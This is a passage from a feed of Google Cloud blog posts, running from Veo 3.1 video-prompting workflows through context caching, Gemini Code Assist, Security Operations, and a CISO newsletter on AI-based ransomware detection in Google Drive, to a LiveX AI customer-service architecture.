Dialogue: Use quotation marks for specific speech (e.g., A woman says, “We have to leave now.”).
Sound effects (SFX): Describe sounds with clarity (e.g., SFX: thunder cracks in the distance).
Ambient noise: Define the background soundscape (e.g., Ambient noise: the quiet hum of a starship bridge).
Mastering negative prompts
To refine your output, describe what you wish to exclude. For example, specify “a desolate landscape with no buildings or roads” instead of “no man-made structures”.
Prompt enhancement with Gemini
If you need to add more detail, use Gemini to analyze and enrich a simple prompt with more descriptive and cinematic language.
Advanced creative workflows
While a single, detailed prompt is powerful, a multi-step workflow offers unparalleled control by breaking down the creative process into manageable stages. The following workflows demonstrate how to combine Veo 3.1’s new capabilities with Gemini 2.5 Flash Image (Nano Banana) to execute complex visions.
Workflow 1: The dynamic transition with “first and last frame”
This technique allows you to create a specific and controlled camera movement or transformation between two distinct points of view.
Step 1: Create the starting frame: Use Gemini 2.5 Flash Image to generate your initial shot.
Gemini 2.5 Flash Image prompt:
“Medium shot of a female pop star singing passionately into a vintage microphone. She is on a dark stage, lit by a single, dramatic spotlight from the front. She has her eyes closed, capturing an emotional moment. Photorealistic, cinematic.”
Step 2: Create the ending frame: Generate a second, complementary image with Gemini 2.5 Flash Image, such as a different POV angle.
Gemini 2.5 Flash Image prompt:
“POV shot from behind the singer on stage, looking out at a large, cheering crowd. The stage lights are bright, creating lens flare. You can see the back of the singer’s head and shoulders in the foreground. The audience is a sea of lights and silhouettes. Energetic atmosphere.”
Step 3: Animate with Veo. Input both images into Veo using the First and Last Frame feature. In your prompt, describe the transition and the audio you want.
Veo 3.1 prompt: “The camera performs a smooth 180-degree arc shot, starting with the front-facing view of the singer and circling around her to seamlessly end on the POV shot from behind her on stage. The singer sings “when you look me in the eyes, I can see a million stars.”
Workflow 2: Building a dialogue scene with “ingredients to video”
This workflow is ideal for creating a multi-shot scene with consistent characters engaged in conversation, leveraging Veo 3.1’s ability to craft a dialogue.
Step 1: Generate your “ingredients”: Create reference images using Gemini 2.5 Flash Image for your characters and the setting.
Step 2: Compose the scene: Use the Ingredients to Video feature with the relevant reference images.
Prompt “Using the provided images for the detective, the woman, and the office setting, create a medium shot of the detective behind his desk. He looks up at the woman and says in a weary voice, “Of all the offices in this town, you had to walk into mine.”
Prompt: “Using the provided images for the detective, the woman, and the office setting, create a shot focusing on the woman. A slight, mysterious smile plays on her lips as she replies, “You were highly recommended.”
This workflow allows you to direct a complete, multi-shot sequence with precise cinematic pacing, all within a single generation. By assigning actions to timed segments, you can efficiently create a full scene with multiple distinct shots, saving time and ensuring visual consistency.
Prompt example:
[00:00-00:02] Medium shot from behind a young female explorer with a leather satchel and messy brown hair in a ponytail, as she pushes aside a large jungle vine to reveal a hidden path.
[00:02-00:04] Reverse shot of the explorer's freckled face, her expression filled with awe as she gazes upon ancient, moss-covered ruins in the background. SFX: The rustle of dense leaves, distant exotic bird calls.
[00:04-00:06] Tracking shot following the explorer as she steps into the clearing and runs her hand over the intricate carvings on a crumbling stone wall. Emotion: Wonder and reverence.
[00:06-00:08] Wide, high-angle crane shot, revealing the lone explorer standing small in the center of the vast, forgotten temple complex, half-swallowed by the jungle. SFX: A swelling, gentle orchestral score begins to play.
Start creating with Veo 3.1 in Vertex AI
You now have the framework to direct Veo with precision. The best way to master these techniques is to apply them for real-world use cases.
For developers and enterprise users, the improved Veo 3.1 model is available in preview on Vertex AIvia the API. This allows you to experiment with these advanced prompting workflows and build powerful, controlled video generation capabilities directly into your own applications.
Thanks to Anish Nangia, Sabareesh Chinta, and Wafae Bakkali for their contributions to prompting guidance for customers.
As developers build increasingly sophisticated AI applications, they often encounter scenarios where substantial amounts of contextual information — be it a lengthy document, a detailed set of system instructions, a code base — need to be repeatedly sent to the model. While this data provides models with much-needed context for their responses, it often escalates costs and latency due to re-processing of the repeated tokens.
Enter Vertex AI context caching, which Google Cloud first launched in 2024 to tackle this very challenge. Since then, we have continued to improve Gemini serving for improved latency and costs for our customers. Caching works by allowing customers to save and reuse precomputed input tokens. Some benefits include:
Significant cost reduction: Customers pay only 10% of standard input token cost for cached tokens for all supported Gemini 2.5 and above models. For implicit caching, this cost saving is automatically passed on to you when a cache hit occurs. With explicit caching, this discount is guaranteed, providing predictable savings.
Latency: Caching reduces latency by looking up previously computed content instead of recomputing.
Let’s dive deeper into context caching and how you can get started.
What is Vertex AI context caching?
As the name suggests, Vertex AI context caching aims to cache tokens of repeated content, and we offer two types:
Implicit caching: Automatic caching which is enabled by default that provides cost savings when cache hits occur. Without needing to make any changes to your API calls, Vertex AI’s serving infrastructure automatically caches tokens and utilizes the states (KV pairs) from previous requests to speed up subsequent turns and provide cost savings. This continues for ensuing prompts, with retention based on overall load and reuse frequency, with caches always deleted within 24 hours.
Explicit caching: Users get more control of caching behavior by explicitly declaring the content to cache and then can refer to the cached content in the prompts as needed. Explicit caching discount is guaranteed, providing predictable savings.
To support prompts and use cases of various sizes, we’ve enabled caching from a minimum of 2,048 tokens to the size of the models context window, which in the case of Gemini 2.5 Pro is over 1 million tokens. Cached content can be any of the modalities (text, pdf, image, audio or video) supported by Gemini multimodal models. For example, you can cache a large amount of text, audio, or video. See list of supported models here.
To make sure users get the benefit of caching wherever and however they use Gemini, both forms of caching support global and regional endpoints. Further, Implicit caching is integrated with Provisioned Throughput to ensure production grade traffic gets the benefits of caching. To add an additional layer of security and compliance, Explicit caches can be encrypted using Customer Managed Encryption Keys (CMEKs).
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x7f6efbd2d7c0>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>
Ideal use cases for context caching:
Large-scale document processing: Cache lengthy contracts, case files, or (academic/ regulatory / finance / R&D) documents to repeatedly query for specific clauses, precedents, or compliance checks.
For example, a Financial analyst using Gemini might upload dozens of documents such as annual reports that they want to subsequently query/analyze/extract/summarize and more. Instead of reuploading these documents each time they have a new question or want to start a new analysis, Context caching stores this already processed information. Once the analyst is done with their work, they can either manually clear the explicit cache or the implicit cache will automatically clear.
Building customer support chatbots/conversational agents: To consistently follow a detailed persona or numerous rules, a chatbot can cache these instructions. Similarly, caching product information allows a chatbot to provide relevant content.
For example, a customer support chatbot may have very detailed system instructions on how to respond to user questions, what information can be referenced when helping a user, and more. Instead of recomputing this each time a new customer conversation is started, compute it once and allow chatbots to reference this content. This can lead to significantly faster response times for chatbots and reduced overall costs.
Coding: By keeping a cache version of your codebase, improve codebase Q&A, autocomplete, bug fixing, and feature development.
Caching enterprise knowledge bases (Q&A): For large enterprises, cache complex technical documentation, internal wikis, or compliance manuals. This enables employees to get quick answers to questions about internal processes, technical specifications, or regulatory requirements.
Cost implications for implicit and explicit caching
Implicit caching: Enabled by default for all Google Cloud projects, as cache hits occur when repeated content is sent we automatically pass on a discount. The tokens that write to cache are charged as standard input tokens (no additional charge to write to cache).
Explicit caching:
Cached token count: When you create a CachedContent object, you pay a one-time fee for the initial caching of those tokens which is the standard input token cost. Subsequently, each time you use this cached content in a generate_content request, you are billed for the cached tokens at a 90% discount compared to sending them as regular input tokens.
Storage duration (TTL): You are also billed for the duration that the cached content is stored, based on its Time-To-Live (TTL). This is an hourly rate per million tokens stored prorated down to the minute level.
Best practices and how to optimize cache hit rate:
Check the limitations: First, check that you are within the caching limitations, such as min cache size and supported models.
Granularity: Add the cached/repeated portion of your context at the beginning of the prompt. Avoid caching small, frequently changing pieces.
Monitor usage and costs: Regularly check your Google Cloud billing reports to understand the impact of caching on your expenses. To see how many tokens are cached, see cachedContentTokenCount in the UsageMetadata.
Frequency: Implicit caches are cleared in 24 hours or less, a smaller time window of repeated requests will keep the cache available.
For explicit caching specifically:
TTL Management: Set the ttl (Time-To-Live) carefully. A longer TTL incurs more storage cost but reduces recreation overhead. Balance this based on how long your context remains relevant and how frequently it’s accessed.
Get started:
Context caching is a game-changer for optimizing the performance and cost-efficiency of your AI applications. By intelligently leveraging this feature, you can significantly reduce redundant token processing, achieve faster response times, and ultimately build more scalable and cost-effective generative AI solutions.
Implicit caching is enabled by default for all GCP projects, so you can get started today.
To get started with explicit caching check out our documentation (here is sample code to create your first cache), and a Colab notebook with common examples and code.
For engineering teams, a critical DORA metric is “Lead Time for Changes,” which measures the time from a code commit to its deployment in production. The 2025 State of AI-Assisted Development Report underscores that manual code review and approval processes are a significant bottleneck, negatively impacting this metric. The report reveals that a combined 60.2% of organizations have a lead time for changes of over a day, with 31.9% taking between a day and a week, and 28.3% taking between a week and a month. This delay is often because senior developers are consumed by manual code reviews, where they enforce coding standards and identify anti-patterns.
The challenge for IT leaders is clear: how do you remove this review bottleneck, especially when your code is spread across complex environments like GitHub Enterprise Cloud or on-premises servers?
Today, we’re introducing a solution to that challenge. We are launching a public preview of Gemini Code Assist on GitHub for enterprise customers, providing you with AI powered code reviews to meet the needs of enterprises.
Works where you work – now with GitHub Enterprise Support
You can’t fix a bottleneck you can’t reach. Our Gemini Code Assist on GitHub app, which is targeted for individual developers and OSS maintainers, was limited to github.com repositories. This enterprise version is built to support the most common code management options enterprises use from Github – from GitHub Enterprise Cloud (GHEC) to privately-hosted GitHub Enterprise Server (on-premises).
Through a secure integration, this feature is the “key” that unlocks code-review automation for your entire enterprise, regardless of which GitHub source code management option you use.
Manage at scale with organization-level controls
A primary challenge for platform admins is deploying and administration of AI assisted code reviews across their repository footprint. This release is designed to make that simple. It gives platform teams the power to define a “golden path” for code quality and automate its enforcement from a central location.
These new org-level settings provide a baseline for all repositories, while still allowing individual teams to set their own repo-level style guides and configurations for further customization.
Central custom style guides:. You can now define and enforce a single, organization-wide style guide. The AI agent automates the style and syntax feedback ensuring your specific rules are checked before a human ever sees the PR. This frees your human reviewers to focus only on high-value architecture and logic, dramatically shortening the review cycle.
Org-wide configurations: To help you manage notifications at scale, you can now set the comment severity level across your entire organization from a central admin page, with more org-level configurations coming soon.
Enterprise-grade trust and compliance
This release is built on a foundation of enterprise trust and designed with Google Cloud level security and data protections. The enterprise version of the code review agent operates under the Google Cloud Terms of Service. As part of our product, your code used as part of prompts to Gemini models and model responses are stateless in Google Cloud services and not stored. To help protect the privacy of your data, we conform to Google’s privacy commitment with generative AI technologies including that Google doesn’t use your data to train our models without permission.
This enterprise release is part of our broader effort to bring AI assistance across your entire software development lifecycle.
Recently released: In case you missed it, we also recently launched the Code Review Gemini CLI Extension, bringing powerful AI assistance and agentic capabilities directly to your terminal
What’s next: We’re just getting started. We are already developing new agentic loop capabilities for the GitHub app to help automate issue resolution and bug fixing. And, we continue to expand our support to other Source Code Management products.
To allow your teams to test and use the agent’s full capabilities, the public preview also includes a significantly higher pull request quota than the individual developer tier.
The evolving security landscape demands more than just speed. It requires an intelligent, automated defense. Google Security Operations is an AI-powered platform built to deliver a modern agentic security operations center (SOC), where generative AI is woven into the fabric of your operations.
We go beyond traditional SIEM and SOAR by using AI as a force multiplier for your team. Gemini automates data analysis, guides investigations with clear insights, and streamlines response actions which can significantly reduce analyst toil and accelerate the security lifecycle. The result is a highly-efficient SOC that empowers your team to proactively hunt threats and stay ahead of adversaries.
We’re excited to share that Gartner has recognized Google as a Leader in the 2025 Gartner® Magic Quadrant™ for Security Information and Event Management (SIEM). In our second year of participation, we’ve been positioned in the leaders quadrant, which can be attributed to our “Ability to Execute” and “Completeness of Vision.” We’re especially proud that we were positioned highest on the “Completeness of Vision” axis amongst all participants.
Gartner also acknowledges our AI and workflow capabilities. They said, “Use of AI is a core competency for Google and its SecOps platform offers strong AI functionality throughout many of the common activities and functions associated with SIEM operations. Its well integrated automation capabilities add to this overall strength.”
Are you a regular user of Google Security Operations? Review your experience on Gartner Peer Insights and get a $25 gift card.
The intelligence-driven, AI-powered platform for the future
Google Security Operations delivers an open, scalable platform infused with Google’s market-leading threat intelligence and AI automation to help SOC teams accelerate their ability to detect, defend against, and respond to threats. Using our platform, customers have seen up to 240% return on investment (ROI) over three years, and have reduced the risk and cost of a breach by as much as 70%.
Teams can use Google Security Operations to detect more threats with less effort through a rich and growing set of curated detections out of the box. These detections are developed and continuously maintained by our team of threat researchers. SOC teams can also use natural language through Gemini to search their data, create detections and response playbooks.
To streamline the work of the SOC, Google Security Operations offers an intuitive experience for security analysts that includes threat-centered case management; interactive, context-rich alert graphing; and automatic stitching together of entities. This experience can help teams investigate and respond with speed and precision using SOAR capabilities. As a direct result of these efficiencies, our customers have seen up to 50% faster mean time to respond (MTTR) and 65% faster mean time to investigate (MTTI).3
Over the last year, we have added significant capabilities that we believe have contributed to our position as a Leader.
Powerful AI workflow augmentation. As a core Google competency, and part of what makes our security operations platform effective, our early investment in generative AI capabilities has helped increase productivity. Strong, tightly-integrated AI functionality through Gemini in Security Operations can boost the everyday activities and functions of security operations teams.
From using natural language to search, generate detections, and create playbooks, to more efficient investigations, our Gemini investigative chat assistant can help SOC analysts gain context and details about cases — and crucial recommendations on how to respond. The platform’s ease-of-use and gen AI capabilities are particularly empowering for new team members, which customers have noted reduced their time to productivity by up to 70%, and shifted up to 35% of security operations work to junior analysts.3
Google Security Operations offers automation that can help improve SOC team workflows and their ability to hunt for threats become more efficient and effective. We’re also continuing to evolve Google Security Operations automation with AI agents and our vision for the agentic SOC.
The agentic SOC promises a fundamental shift for teams, where intelligent agents work alongside human analysts to autonomously take on routine tasks, augment human decision-making, automate workflows, and empower security experts to focus on the complex investigations and strategic challenges that truly demand human-in-the-loop expertise.
Building for our customers
We feel this ranking reflects our commitment to an open platform that easily integrates into customers’ existing ecosystems through supporting third-party data ingestion, providing federated deployments, enabling multi-tenancy management, and using automation and Gemini to augment security workflows.
Ultimately, our platform’s value is best measured by the confidence it delivers to our customers. As a CISO from an insurance company put it, “In simple terms, Google SecOps is a mass risk-reducer. Threats that would have impacted our business no longer do, because we have greater observability, better mean time to detect, and better mean time to respond.”3
We are grateful to our customers’ trust and for partnering with us on this journey. We are committed to working together closely, and to ensure that our accelerated innovation helps you stay ahead of the evolving threat landscape.
Starting October 27th in Washington, D.C. the future of artificial intelligence (AI) takes center stage, and Google Cloud and NVIDIA are teaming up to lead the conversation. Across two upcoming events—NVIDIA GTC DC and the Google Public Sector Summit—we will showcase our commitment to advancing American AI leadership. This is where innovation meets mission. From developers building next-generation models to government leaders deploying them for mission impact, our partnership is providing the secure, scalable, and powerful foundation needed to solve the nation’s most complex challenges.
NVIDIA GTC DC (October 27-29)
Kicking off the week, NVIDIA GTC DC brings together the brightest minds in AI and high-performance computing. This is your chance to dive deep into the technologies shaping our future.
On October 28, NVIDIA Founder and CEO, Jensen Huang will unveil the next wave of groundbreaking advancements in HPC, and AI infrastructure. His keynote will highlight new frontiers in agentic AI, physical AI, high-performance computing, and quantum computing, setting the stage for a conference that brings together developers, researchers and industry leaders for over 70 sessions, live demos and hands-on workshops.
Google Cloud is proud to be a sponsor to address a key challenge: how to use the most powerful AI models, while keeping your data private and secure. Discover how Google Cloud’s engineering partnership with NVIDIA delivers a platform for mission-critical AI workloads. We combine AI-optimized hardware, open software, and industry solutions, giving you the power to deploy cutting-edge AI models securely, wherever your data resides, on-premises, air-gapped environments, and the edge.
Google Public Sector Summit (October 29)
Following GTC DC, the focus shifts to the Google Public Sector Summit. This is a premier gathering of government leaders representing federal, defense, national security, and state agencies, as well as research institutions to dive deeper into the transformative factors shaping the public sector. This new era is defined by unprecedented innovation, greater efficiency, and elevated citizen experiences. We will explore government mission use cases that demonstrate the profound impact of groundbreaking technologies, like the newly launched Gemini for Government.
This year’s Google Public Sector Summit features a truly special moment: a Luminary Talk from Google Cloud CEO, Thomas Kurian followed by a Luminary Fireside Chat with NVIDIA CEO and Founder, Jensen Huang. They will discuss how our work together is reshaping mission outcomes, accelerating digital transformation, and enabling government agencies to bring AI to their data, wherever it lives.
Join us in Washington, D.C., to explore how, together, we are unlocking innovation for everyone. You’ll get a firsthand look at how mission-proven technology is solving critical public sector challenges, today.
Welcome to the first Cloud CISO Perspectives for October 2025. Today, Kristina Behr, VP, Workspace Product Management, and Jorge Blanco, director, Office of the CISO, explain how a new AI-driven capability in Google Drive can help security and business leaders protect their data and minimize the impact of ransomware attacks.
As with all Cloud CISO Perspectives, the contents of this newsletter are posted to the Google Cloud blog. If you’re reading this on the website and you’d like to receive the email version, you can subscribe here.
aside_block
<ListValue: [StructValue([(‘title’, ‘Get vital board insights with Google Cloud’), (‘body’, <wagtail.rich_text.RichText object at 0x7f316296fbb0>), (‘btn_text’, ‘Visit the hub’), (‘href’, ‘https://cloud.google.com/solutions/security/board-of-directors?utm_source=cloud_sfdc&utm_medium=email&utm_campaign=FY24-Q2-global-PROD941-physicalevent-er-CEG_Boardroom_Summit&utm_content=-&utm_term=-‘), (‘image’, <GAEImage: GCAT-replacement-logo-A>)])]>
Disrupt ransomware with AI in Google Drive
By Kristina Behr, VP, Workspace Product Management, and Jorge Blanco, director, Office of the CISO
Kristina Behr, VP, Workspace Product Management
We all know that ransomware is a scourge, notorious for evading traditional antivirus and endpoint detection and response solutions, causing great financial and reputational damage to organizations around the world. As part of our efforts to make technology safer and more secure for all, we’ve created a new AI-powered layer of defense against ransomware for Google Workspace customers who use the Google Drive for desktop app for Windows and macOS.
While Google Docs, Sheets, and other native Workspace documents are already secure by design and unimpacted by ransomware, and ChromeOS has never had a ransomware attack, we know users rely on a mix of services and file formats like Microsoft Office documents and PDFs, and Windows and Mac desktop operating systems.
Recovering from a ransomware attack is disruptive and takes time, usually requiring the IT team to shut down their entire network to restore data and systems from backups. The financial costs of ransomware are staggering: At least $3.1 billion has been paid in ransom for more than 4,900 ransomware attacks since 2021 — and these are only the attacks that we know of because they’ve been reported, said the U.S. government in 2024.
Jorge Blanco, director, Office of the CISO
Meanwhile, the cost of an average data breach exceeded $5 million. Year after year, ransomware comprises more than one-fifth of cyberattacks, and in 2024 Mandiant observed 21% of all intrusions were related to ransomware.
The ability to identify early signals of threats like ransomware is paramount, as they pose a significant systemic risk to organizations. A successful attack can compromise the operational resilience of critical sectors, leading to prolonged downtime and data theft.
For example, ransomware attacks in the financial sector can disrupt the availability of payment systems and markets. The EU’s Digital Operational Resilience Act (DORA) directly addresses this by enforcing strict rules for information and communication technology risk management, resilience testing, and third-party supervision. In addition to financial and recovery costs, failure to comply could lead to operational and regulatory penalties.
To help our Workspace customers defend against ransomware attacks, we’ve developed a proprietary AI model that looks for signals that a file has been maliciously modified by ransomware — and stops it before it can spread.
Similarly, ransomware that targets healthcare organizations directly jeopardizes patient safety by restricting access to electronic health records and diagnostic tools, resulting in delayed treatments, ambulance diversions, and a measurable, material risk of higher mortality rates. Ransomware has even forced hospitals to permanently close.
Ransomware is an organization-wide threat. The high costs of remediating ransomware are as concerning for boards of directors as they are for CISOs and the security teams who report to them. To help our Workspace customers defend against ransomware attacks, we’ve developed a proprietary AI model that looks for signals that a file has been maliciously modified by ransomware — and stops it before it can spread.
These new capabilities enable smart detection of file corruption that is characteristic of a ransomware attack. It automatically halts activity to prevent file corruption from reaching cloud-stored assets, and allow for simple recovery and restoration of affected files stored on Google Drive, regardless of file format.
AI-powered ransomware detection in Drive for desktop can help secure essential government, education, and business operations, and also upend the ransomware business model by disrupting attacks in progress and offering rapid file recovery. Importantly, these capabilities have been integrated into the user experience and designed intuitively so that non-technical users can take full advantage. We are rolling this out now at no extra cost for most Google Workspace commercial plans.
How it works
Trained on millions of ransomware samples, this new layer of defense can identify the core signature of a ransomware attack — an attempt to encrypt or corrupt files en masse — and rapidly stop file syncing to the cloud before the ransomware can spread and encrypt the data. It also allows users to easily restore files with a few clicks.
The AI uses a proprietary, deep learning model that continuously looks for signs of maliciously modified files. Its detection engine can identify ransomware by analyzing patterns of file changes as they sync from desktop to Google Drive. The detection uses intelligence from Google’s battle-tested, malware-detection ecosystem, including VirusTotal.
Built-in malware defenses, also available in Gmail and Google Chrome, can help prevent ransomware from spreading to other devices and taking over entire networks. We believe that these layers of defense can help organizations in industries such as healthcare, retail, education, manufacturing, and government from being disrupted by ransomware attacks.
Restoring corrupted files
A key capability of this defense empowers customers to restore their files, unlike traditional solutions that require complex re-imaging or costly third-party tools. The Google Drive interface allows users to restore multiple files to a previous, healthy state with just a few clicks.
This rapid recovery capability can help to minimize user interruption and data loss, even when using Microsoft Windows, Office, and other traditional software.
Additional ransomware defenses
As AI augments and even reinvents protection against ransomware in some very powerful ways, it’s clear that organizations should do more to adopt the secure by design mentality.
There’s no single tool that can defeat all ransomware attacks, so we recommend organizations emphasize a layered, defense in depth approach. Organizations should incorporate automation and awareness strategies such as strong password policies, mandatory multi-factor authentication, regular reviews of user access and cloud storage bucket security, leaked credential monitoring on the dark web, and account lockout mechanisms.
One way to get started is to identify user groups, including sales and marketing teams, that can transition to more ransomware-resilient endpoints. Moving to devices that run ChromeOS, iOS, and Android could meaningfully reduce security risks — for example, Chromebooks are inherently more resilient against ransomware and malware in general.
For legacy Windows applications that can’t run on the web, we recommend Cameyo as a solution that allows users to continue using Windows apps in a more secure environment, such as ChromeOS.
To learn more about how we’re using AI to stop ransomware with Google Drive, read our recent Workspace blog.
aside_block
<ListValue: [StructValue([(‘title’, ‘Tell us what you think’), (‘body’, <wagtail.rich_text.RichText object at 0x7f316296f2e0>), (‘btn_text’, ‘Join the conversation’), (‘href’, ‘https://google.qualtrics.com/jfe/form/SV_2n82k0LeG4upS2q’), (‘image’, <GAEImage: GCAT-replacement-logo-A>)])]>
In case you missed it
Here are the latest updates, products, services, and resources from our security teams so far this month:
Same same but also different: Google guidance on AI supply chain security: At Google, we believe that AI development is similar to traditional software, so existing security measures should readily adapt to AI. Here’s what you need to know. Read more.
How economic threat modeling helps CISOs become chief revenue protection officers: Economic threat modeling is a way of thinking about, identifying, and managing risk in a financially responsible way. Here’s why CISOs should start doing it. Read more.
Digital sovereignty 101: Your questions answered: Here’s what security and business leaders should know about what digital sovereignty is, and how Google Cloud is helping customers achieve it. Read more.
How we’re securing the AI frontier: We’re announcing a new AI Vulnerability Reward Program, an updated Secure AI Framework 2.0 for AI, and the release of our new AI-powered agent CodeMender, which improves code security automatically. Read more.
Accelerating adoption of AI for cybersecurity at DEF CON 33: Empowering cyber defenders with AI is critical as they battle cybercriminals and keep users safe. To help accelerate adoption of AI for cybersecurity workflows, we partnered with Airbus at DEF CON 33 to host the GenSec Capture the Flag (CTF), dedicated to human-AI collaboration in cybersecurity. Read more.
Announcing quantum-safe Key Encapsulation Mechanisms in Cloud KMS: We’re supporting post-quantum Key Encapsulation Mechanisms in Cloud KMS, in preview, enabling customers to begin migrating to a post-quantum world. Read more.
Master network security with Google Cloud’s latest learning path: Google Cloud is launching a new Network Security Learning Path that culminates in the Designing Network Security in Google Cloud advanced skill badge. Read more.
Mandiant Academy: Basic Static and Dynamic Analysis course now available: To help you get started in pursuing malware analysis as a primary specialty, we’re introducing Mandiant Academy’s new Basic Static and Dynamic Analysis course. Read more.
The future of media sanitization at Google: Starting in November, Google Cloud will begin transitioning our approach to media sanitization to fully rely on a robust and layered encryption strategy. Read more.
Please visit the Google Cloud blog for more security stories published this month.
aside_block
<ListValue: [StructValue([(‘title’, ‘Join the Google Cloud CISO Community’), (‘body’, <wagtail.rich_text.RichText object at 0x7f316296fdf0>), (‘btn_text’, ‘Learn more’), (‘href’, ‘https://rsvp.withgoogle.com/events/ciso-community-interest?utm_source=cgc-blog&utm_medium=blog&utm_campaign=2024-cloud-ciso-newsletter-events-ref&utm_content=-&utm_term=-‘), (‘image’, <GAEImage: GCAT-replacement-logo-A>)])]>
Threat Intelligence news
Oracle E-Business Suite zero day exploited in widespread extortion campaign: A new, large-scale extortion campaign by a threat actor claiming affiliation with the CL0P extortion brand has been targeting Oracle E-Business Suite (EBS) environments. Along with our analysis of the campaign, we provide actionable guidance for defenders. Read more.
Frontline observations: UNC6040 hardening recommendations: Protecting software-as-a-service (SaaS) platforms and applications requires a comprehensive security strategy. In this guide drawn from analysis of UNC6040’s specific attack methodologies, we present a structured defensive framework and emphasize Salesforce-specific security recommendations. Read more.
Please visit the Google Cloud blog for more threat intelligence stories published this month.
Now hear this: Podcasts from Google Cloud
How CISOs have evolved from security cop to cloud and AI champion: David Gee, board risk advisor and former CISO, shares his guidance for security leaders with hosts Anton Chuvakin and Tim Peacock, and discusses how the necessary skills, knowledge, experience, and behaviors for a CISO have evolved. Listen here.
From scanners to AI: 25 years of vulnerability management with Qualys’ CEO: Sumedh Thakar, president and CEO, Qualys, talks with hosts Anton and Tim about how vulnerability management has changed since 1999, whether we can we actually remediate vulnerabilities automatically at scale, and of course, AI. Listen here.
Securing real AI adoption, from consumer chatbots to enterprise guardrails: Rick Caccia, CEO and co-founder, Witness AI, discusses with Anton and Tim how AI is similar to — and different from — previous massive technology shifts. Listen here.
Behind the Binary: The machine learning revolution in reverse engineering: Host Josh Stroschein is joined by Hahna Kane Latonick for a deep dive into the powerful world where reverse engineering meets data science. Listen here.
To have our Cloud CISO Perspectives post delivered twice a month to your inbox, sign up for our newsletter. We’ll be back in a few weeks with more security-related updates from Google Cloud.
Customer service teams at fast-growing companies face a challenging reality: customer inquiries are growing exponentially, but scaling human teams at the same pace isn’t always sustainable.
Intelligent AI tools offer a new path forward. They handle routine questions automatically so employees can focus on more complex customer service tasks that require empathy, judgment, and creative problem-solving.
LiveX AI enables businesses to build and deploy advanced AI systems that deliver natural conversational experiences at scale. These can show up as chat bots, call center agents — even 3D holographic personas in live settings.
To handle thousands of concurrent, real-time interactions with low latency requires infrastructure that is both powerful and elastic, especially when seamlessly escalating complex issues to human agents.
In this joint technical post, we’ll share the technical blueprint LiveX AI uses to build and scale its intelligent customer experience systems on Google Cloud, demonstrating how the right combination of services makes this transformation possible.
Why this architecture matters: Proven ROI
This architecture delivers measurable business impact.
90%+ self-service rate for Wyze: Smart home leader Wyze deployed LiveX AI to achieve a 90%+ self-service rate, enabling their support team to focus on complex cases that require human expertise while improving the overall customer experience.
3x conversion for Pictory: The video creation platform Pictory saw a 3x increase in conversions by using LiveX AI to proactively engage and qualify website visitors.
These results are only possible through a sophisticated, scalable, and secure architecture built on Google Cloud.
Platform capabilities designed for scale
The LiveX AI platform is designed to be production-ready, enabling companies to easily deploy intelligent customer experience systems. This is possible through key capabilities, all running on and scaling with Google Cloud’s Cloud Run and Google Kubernetes Engine (GKE):
AgentFlow orchestration: The coordination layer that manages conversation flow, knowledge retrieval, and task execution. It routes routine queries automatically and escalates complex issues to human agents with full context.
Multilingual by design: Built to deliver native-quality responses in over 100 languages, leveraging powerful AI models and Google’s global-scale infrastructure.
Seamless integration: Connects securely to internal and external APIs, enabling the system to access account information, process returns, or manage subscriptions, giving human agents complete context when they step in.
Customizable knowledge grounding: Trained on specific business knowledge to ensure accurate and consistent responses aligned with team expertise.
Natural interface: Deployed via chat, voice, or avatar interfaces across web, mobile, and phone channels.
Figure 1: LiveX real-world 3D assistants
The technical blueprint: Building intelligent customer experience systems on Google Cloud
LiveX AI’s architecture is intelligently layered to optimize for performance, scalability, and cost-efficiency. Here’s how specific Google Cloud services power each layer.
Figure 2: LiveX AI customer service agent architecture on Google Cloud
The front-end layer
Managing real-time communication across web, mobile, and voice channels requires lightweight microservices that handle session management, channel integration, and API gateway services.
Cloud Run is the ideal platform for this workload. As a fully managed, serverless solution, it automatically scales from zero to thousands of instances during traffic spikes, then scales back down, so LiveX AI only pays for the computation they actually use.
The orchestration and AI engine
The platform’s core, AgentFlow, manages the conversational state, interprets customer intent, and coordinates responses. When issues require human expertise, it routes them to agents with complete context. The system processes natural language input to determine customer intent, breaks down requests into multi-step plans, and connects to databases (like Cloud SQL) and external platforms (Stripe, Zendesk, Intercom, Salesforce, Shopify) so both AI and human agents have complete customer context.
Cloud Run for orchestration automatically scales based on request traffic, perfectly handling fluctuating conversational loads with pay-per-use billing.
GKE for AI inference provides the specialized capabilities needed for real-time AI:
GPU management: GKE’s cluster autoscaler dynamically provisions GPU node pools only when needed, preventing costly idle time. Spot VMs significantly reduce training costs.
Hardware acceleration: Seamless integration with NVIDIA GPUs and Google TPUs, with Multi-Instance GPU (MIG) support to maximize utilization of expensive accelerators.
Low latency: Fine-grained control over specialized hardware and the Inference Gateway enable intelligent load balancing for real-time responses.
With this foundation, LiveX AI can serve millions of concurrent users during peak demand while maintaining sub-second response times.
The knowledge and integration layer
From public FAQs to secure account details, the knowledge layer provides all the information the system needs to deliver helpful responses.
The Doc Processor (on Cloud Run) builds and maintains the knowledge base in the vector database for the Retrieval-Augmented Generation (RAG) system, while the API Gateway manages configuration and authentication. For long-term storage, LiveX AI relies on Cloud SQL as the management database, while short-term context is kept in Google Cloud Memorystore.
Putting it all together
Three key advantages emerge from this design: elastic scaling that matches actual demand, cost efficiency through serverless and managed GKE services, and the performance needed for real-time conversational AI at scale.
Looking ahead: Empowering customer experience teams at scale
The future of customer service centers on intelligent systems that amplify what human agents do best: empathy, judgment, and creative problem-solving. Businesses that adopt this approach empower their teams to deliver the personalized attention that builds lasting customer relationships, freed from the burden of repetitive queries.
For teams evaluating AI-powered customer experience systems, this architecture offers a proven blueprint: start with Cloud Run for elastic front-end scaling, leverage GKE for AI inference workloads, and ensure seamless integration with existing platforms.
The LiveX AI and Google Cloud partnership demonstrates how the right platform and infrastructure can transform customer service operations. By combining intelligent automation with elastic, cost-effective infrastructure, businesses can handle exponential inquiry growth while enabling their teams to focus on building lasting customer relationships.
To explore how LiveX AI can help your team scale efficiently, visit the LiveX AI Platform.
To build your own generative AI applications with the infrastructure powering this solution, get started with GKE and Cloud Run.
We are excited to share that Google has been recognized as a Leader in the 2025 Gartner® Magic Quadrant™ for API Management, positioned highest for our Ability to Execute — marking our tenth consecutive recognition.
Google was positioned highest in Ability to Execute of all vendors evaluated. We believe this reflects our commitment supporting traditional API use cases, but also in providing a bridge for our customers to AI and agentic AI management, using the same familiar platform and native controls.
